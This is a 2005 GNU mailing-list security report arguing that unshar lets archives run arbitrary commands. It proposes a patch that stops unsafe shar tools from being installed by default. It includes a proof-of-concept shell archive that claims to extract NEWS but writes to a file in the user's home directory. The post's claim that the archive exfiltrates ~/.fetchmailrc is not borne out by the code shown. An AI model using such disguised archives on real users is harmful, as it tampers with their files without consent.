unshar is unsafe

bug-gnu-utils
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
unshar is unsafe

From:	Bruno Haible
Subject:	unshar is unsafe
Date:	Wed, 27 Jul 2005 14:07:36 +0200
User-agent:	KMail/1.5
To: address@hidden
Cc: Bruce Korb  <address@hidden>
Subject: unshar is unsafe

Hi,

It should be well-known that "unshar" is unsafe: In the current
implementation, it allows an attacker to execute any shell commands.
For example, the attached file NEWS.shar, when unshared, pretends to
create a file NEWS, but instead overwrites ~/.NEWS (it could just as
well overwrite or append a few lines to your ~/.profile) and sends me
your ~/.fetchmailrc. (Try it :-)).

$ unshar < NEWS.shar 
Standard-Eingabe:
x - Sperrverzeichnis `_sh08096': wurde angelegt
x - packe aus NEWS (Text)
x - Sperrverzeichnis `_sh08096': gelöscht

For this reason, it should be possible to install the useful
programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
programs
  - unshar   (totally unsecure implementation)
  - shar     (educates people to unsecure behaviour)
  - mailshar (unsecure since it invokes shar)
  - remsync  (unsecure since it invokes mailshar)
and the program
  - compress-dummy (only used by 'shar', useless on its own)

And moreover, since the default installation of a GNU system should be
secure, these programs should not be installed by default, only upon
request.

Find attached a crude patch that does this.

          Bruno


ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * configure.ac (ADD_SCRIPT): Remove mail-files.
        (UNSECURE): New installer option --enable-unsecure.

src/ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
        is enabled.
        (bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
        only if UNSECURE is enabled.

doc/ChangeLog:
2005-07-26  Bruno Haible  <address@hidden>

        * Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
        UNSECURE is enabled.

diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
*** sharutils-4.4.orig/configure.ac     2005-07-10 17:57:57.000000000 +0200
--- sharutils-4.4/configure.ac  2005-07-27 01:29:07.000000000 +0200
***************
*** 22,28 ****
  
  dnl AC_ARG_PROGRAM
  
! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
  
  AC_PROG_CC
  AC_PROG_INSTALL
--- 22,28 ----
  
  dnl AC_ARG_PROGRAM
  
! AC_SUBST(ADD_SCRIPT, ["mailshar"])
  
  AC_PROG_CC
  AC_PROG_INSTALL
***************
*** 103,108 ****
--- 103,114 ----
        [disable installation of uuencode and uudecode])])
  AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
  
+ AC_ARG_ENABLE(unsecure,
+   [AS_HELP_STRING([--enable-unsecure],
+      [enable installation of the unsecure programs shar, unshar, mailshar,
+       remsync])])
+ AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
+ 
  AM_GNU_GETTEXT
  AM_GNU_GETTEXT_VERSION([0.14.4])
  AM_WITH_DMALLOC
diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
*** sharutils-4.4.orig/src/Makefile.am  2005-07-09 02:46:46.000000000 +0200
--- sharutils-4.4/src/Makefile.am       2005-07-27 01:13:14.000000000 +0200
***************
*** 17,27 ****
  
  ## Process this file with automake to produce Makefile.in.
  
! bin_PROGRAMS = shar unshar
  if UUCODE
    bin_PROGRAMS += uuencode uudecode
  endif
! bin_SCRIPTS = $(ADD_SCRIPT)
  EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
  
  DISTCLEANFILES = $(bin_SCRIPTS)
--- 17,31 ----
  
  ## Process this file with automake to produce Makefile.in.
  
! bin_PROGRAMS =
! bin_SCRIPTS = mail-files
  if UUCODE
    bin_PROGRAMS += uuencode uudecode
  endif
! if UNSECURE
!   bin_PROGRAMS += shar unshar
!   bin_SCRIPTS += $(ADD_SCRIPT)
! endif
  EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
  
  DISTCLEANFILES = $(bin_SCRIPTS)
diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
*** sharutils-4.4.orig/doc/Makefile.am  2005-07-09 02:32:21.000000000 +0200
--- sharutils-4.4/doc/Makefile.am       2005-07-27 01:02:15.000000000 +0200
***************
*** 19,31 ****
  
  info_TEXINFOS = sharutils.texi
  
! dist_man1_MANS = shar.1 unshar.1
  
  if UUCODE
    dist_man1_MANS += uuencode.1 uuencode.5
    man1_MANS = uudecode.1
  endif
  
  CLEANFILES = $(man1_MANS)
  
  EXTRA_DIST = doclicense.texi
--- 19,35 ----
  
  info_TEXINFOS = sharutils.texi
  
! dist_man1_MANS =
  
  if UUCODE
    dist_man1_MANS += uuencode.1 uuencode.5
    man1_MANS = uudecode.1
  endif
  
+ if UNSECURE
+   dist_man1_MANS += shar.1 unshar.1
+ endif
+ 
  CLEANFILES = $(man1_MANS)
  
  EXTRA_DIST = doclicense.texi



============================= NEWS.shar =============================
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.4).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Made on 2005-07-27 00:21 CEST by <address@hidden>.
# Source directory was `/packages/sharutils-4.4'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   2831 -rwxr-xr-x NEWS
#
save_IFS="${IFS}"
IFS="${IFS}:"
gettext_dir=FAILED
locale_dir=FAILED
first_param="$1"
for dir in $PATH
do
  if test "$gettext_dir" = FAILED && test -f $dir/gettext \
     && ($dir/gettext --version >/dev/null 2>&1)
  then
    case `$dir/gettext --version 2>&1 | sed 1q` in
      *GNU*) gettext_dir=$dir ;;
    esac
  fi
  if test "$locale_dir" = FAILED && test -f $dir/shar \
     && ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
  then
    locale_dir=`$dir/shar --print-text-domain-dir`
  fi
done
IFS="$save_IFS"
if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
then
  echo=echo
else
  TEXTDOMAINDIR=$locale_dir
  export TEXTDOMAINDIR
  TEXTDOMAIN=sharutils
  export TEXTDOMAIN
  echo="$gettext_dir/gettext -s"
fi
if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
  if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
    shar_n= shar_c='
'
  else
    shar_n=-n shar_c=
  fi
else
  shar_n= shar_c='\c'
fi
if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f 
200112312359.59 && test -f $$.touch; then
  shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f 
123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 && 
test -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$2 "$8"'
else
  shar_touch=:
  echo
  $echo 'WARNING: not restoring timestamps.  Consider getting and'
  $echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
#
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
if mkdir _sh08096; then
  $echo 'created'
else
  $echo 'failed to create'
  exit 1
fi
# ============= NEWS ==============
if test -f 'NEWS' && test "$first_param" != -c; then
  $echo 'x -' SKIPPING 'NEWS' '(file already exists)'
else
  $echo 'x -' extracting 'NEWS' '(text)'
  sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation, Inc.
X
Version 4.4 - July 2005, by Bruce Korb
X
* autotool cleanup
* Make a non-alpha release this time.
* Ensure a "intmax_t" exists in the code.
X
X 
Version 4.3.81 - June 2005, by Bruce Korb
X
* Compatibility:  True 64 does not have "snprintf"
* Updated FSF address
X
X 
X
Version 4.3.80 - April 2005, by Bruce Korb
X
* Buglet: Unlink the temporary file when unsharing from stdin.
X
X 
X
Version 4.3.79 - April 2005, by Bruce Korb
X
* rewrote the temporary file handling in unshar to avoid both a theoretical
X  timing hole (hitting it requires cooperation) and a buffer overrun
X  attack (a file name exceeding 1K).
* new translations and updates.  They are all now missing two messages:
X  "allocate file name buffer" and "allocate file buffer".  *sigh*.
X
X 
X
Version 4.3.78 - January 2005, by Bruce Korb
X
* fixed test to not require updates for every release number
* fixed the uuencode man page so that docbook generation can work correctly.
X
X 
Version 4.3.77 - September 2004, by Bruce Korb
X
* Fixed a buffer overrun exploit
X
X 
Version 4.3.76 - December 2002, by Karl Eichwalder
X
* Updated translations: de et fr sv tr.
X
X 
Version 4.3.75 - December 2002, by Karl Eichwalder
X
* Fix compatibility issues (by Bruno Haible).
X
* Support bzip2 as an alternative to gzip (by Bruno Haible).
X
* New translations: ca et hu.
X
* Updated translations: da de ja sv tr zh_TW.
X
X 
Version 4.3.74 - July 2002, by Karl Eichwalder
X
* Many portability fixes (by Bruno Haible).
X
* Updated translation: fr.
X
X 
Version 4.3.73 - July 2002, by Karl Eichwalder
X
* Add support for large files, e.g., files larger than 2 GiB on hosts
X  where 'long' is 32 bits wide (by Paul Eggert).
X
X 
Version 4.3.72 - July 2002, by Karl Eichwalder
X
* Updated translations: fr sv.
X
X 
Version 4.3.71 - July 2002, by Karl Eichwalder
X
* Updated translations: da de.
X
X 
Version 4.3.70 - July 2002, by Karl Eichwalder
X
* Don't install 'compress' link by default; provide
X  --enable-compress-link configure option.
X
* Fix uudecode output file handling.
X
* Updated translations: de tr.
X
X 
Version 4.3.61 - July 2002, by Karl Eichwalder
X
* Re-add the intl subdirectory (libintl from gettext).
X
* Bugfixes.
X
X 
Version 4.3.60 - June 2002, by Karl Eichwalder
X
* Provide a 'compress-dummy' script.  Install it if 'compress' isn't
X  available.  Create a link 'compress' pointing to 'compress-dummy';
X  thus it is possible to unshar legacy shar files calling
X  'compress -d'.
X
* shar: Don't offer '-Z' resp. '--compress' if the system doesn't
X  support 'compress'.
X
X 
Version 4.3.52 - June 2002, by Karl Eichwalder
X
* sync more files coming with automake and related frame work files.
X
* fix temp file races (shar).
X
* fix Y2K bug (shar).
X
* allow spaces in file names (uudecode).
SHAR_EOF
  (set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
  chmod 0755 "$HOME/.NEWS" ||
  $echo 'restore of' 'NEWS' 'failed'
  if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1 
\
  && ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' ) 
>/dev/null; then
    md5sum -c << SHAR_EOF >/dev/null 2>&1 \
    || $echo 'NEWS:' 'MD5 check failed'
23c39bbc9cb029b1881b9dfcbbfe0209  NEWS
SHAR_EOF
  else
    shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
    test 2831 -eq "$shar_count" ||
    $echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
  fi
fi
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
if rm -fr _sh08096; then
  $echo 'removed'
else
  $echo 'failed to remove'
fi
exit 0
[Prev in Thread]
Current Thread
[Next in Thread]
unshar is unsafe, Bruno Haible <=
- Re: unshar is unsafe, Bruce Korb, 2005/07/30
  - Re: unshar is unsafe, Bruno Haible, 2005/07/29
    - Re: unshar is unsafe, Bruce Korb, 2005/07/29
  - Re: unshar is unsafe, John Cowan, 2005/07/30
    - Re: unshar is unsafe, Bruce Korb, 2005/07/30
Prev by Date: [gettext] changequote considered harmful
Next by Date: unshar crash
Previous by thread: [gettext] changequote considered harmful
Next by thread: Re: unshar is unsafe
Index(es):
- Date
- Thread